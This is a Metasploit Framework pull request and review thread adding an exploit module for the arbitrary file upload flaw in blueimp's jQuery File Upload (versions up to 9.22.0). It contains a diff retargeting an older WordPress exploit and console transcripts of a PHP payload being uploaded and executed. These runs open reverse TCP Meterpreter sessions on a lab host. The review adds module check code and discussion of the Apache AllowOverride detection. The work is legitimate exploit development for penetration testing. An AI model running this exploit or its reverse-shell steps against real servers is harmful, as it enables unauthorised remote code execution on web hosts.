### PR TITLE
Add blueimp's jQuery (Arbitrary) File Upload

### PR DESCRIPTION
**Pull request by wvu**
From @busterb: https://www.bleepingcomputer.com/news/security/jquery-file-upload-plugin-vulnerable-for-8-years-and-only-hackers-knew/.

And as noted by @bcoles, we also have a module exploiting this vuln in #5130, though it was described as the WordPress plugin and not the *asset* it had included. The vuln was "patched" in the **plugin** by [deleting](https://github.com/wp-plugins/work-the-flow-file-upload/commit/5f04fdf4f302cd89413e2554ee90d0b1cfb91cf2) the code. Somehow this flew under everyone's noses.

```
msf5 exploit(unix/webapp/wp_worktheflow_upload) > edit
msf5 exploit(unix/webapp/wp_worktheflow_upload) > git diff
[*] exec: git diff

diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
index 727c1936f5..2146be49ec 100644
--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -50,8 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data = data.to_s

     res = send_request_cgi({
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
+      'uri'       => '/jQuery-File-Upload/server/php/index.php',
       'method'    => 'POST',
       'ctype'     => "multipart/form-data; boundary=#{data.bound}",
       'data'      => post_data
@@ -70,8 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote

     print_status("Calling payload...")
     send_request_cgi(
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
+      'uri'       => "/jQuery-File-Upload/server/php/files/#{php_pagename}"
     )
   end
 end
msf5 exploit(unix/webapp/wp_worktheflow_upload) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 172.28.128.1:4444
[+] Our payload is at: rLRFvlAiE.php. Calling payload...
[*] Calling payload...
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54386) at 2018-10-23 03:17:59 -0500
[+] Deleted rLRFvlAiE.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu-xenial
OS          : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
```

Welp.

```
msf5 exploit(unix/webapp/jquery_file_upload) > check

[*] Checking /jQuery-File-Upload/package.json
[+] Found Apache 2.4.18 (AllowOverride None may be set)
[+] Found unpatched jQuery File Upload 9.22.0
[*] 172.28.128.3:80 The target appears to be vulnerable.
msf5 exploit(unix/webapp/jquery_file_upload) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Checking /jQuery-File-Upload/package.json
[+] Found Apache 2.4.18 (AllowOverride None may be set)
[+] Found unpatched jQuery File Upload 9.22.0
[*] Checking /jQuery-File-Upload/server/php/index.php
[+] Found /jQuery-File-Upload/server/php/index.php
[*] Uploading payload
[+] Payload uploaded: http://172.28.128.3/jQuery-File-Upload/server/php/files/FJx2tZWpurPHKIWaYX7sbGTraXTNlRaBB.php
[*] Executing payload
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54414) at 2018-10-23 07:13:22 -0500
[*] Deleting payload

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu-xenial
OS          : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
```

### Edit: Oops, I didn't see this from @lcashdol...

> I should really write a metasploit module.

https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206

@lcashdol: If you're working on a module, would you like to collaborate? I apologize for missing your note.

### CODE REVIEW

**Comment by lcashdol** [comment]
Oh, I would have gotten around to it a month from now.  It would have been functional but a poor example of ruby coding. Thanks!

**Comment by wvu-r7** [comment]
I have completed this PR. It is ready for testing. Napping for a bit!

File: modules/exploits/unix/webapp/jquery_file_upload.rb [hunk 1]
```diff
@@ -0,0 +1,190 @@
...
+      unless a
+        res.headers['Server'] =~ /Apache\/([\d.]+)/ &&
+          $1 && (a = Gem::Version.new($1))
+
+        # We have to make some assumptions about configuration here
+        if a && a >= Gem::Version.new('2.3.9')
+          vprint_good("Found Apache #{a} (AllowOverride None)")
+        elsif a
+          vprint_error("Found Apache #{a} (AllowOverride All)")
+          return CheckCode::Safe
```
Comment (bcoles) [inline modules/exploits/unix/webapp/jquery_file_upload.rb]: This does not seem like a safe assumption given that administrators can re-enable `AllowOverride`.

Comment (wvu-r7) [reply modules/exploits/unix/webapp/jquery_file_upload.rb]: Agreed, hence the parens. Short of a way to detect it, you wanna just remove it? This check turned out to be supplemental in the end.

**Comment by wchen-r7** [comment]
Checking this out today.

**Comment by wchen-r7** [comment]
# Release Notes

This module exploits an arbitrary file upload in the sample PHP upload handler for blueimp's jQuery File Upload widget in versions <= 9.22.0.

**Comment by wchen-r7** [comment]
Excellent job @wvu-r7

**Pull request merged**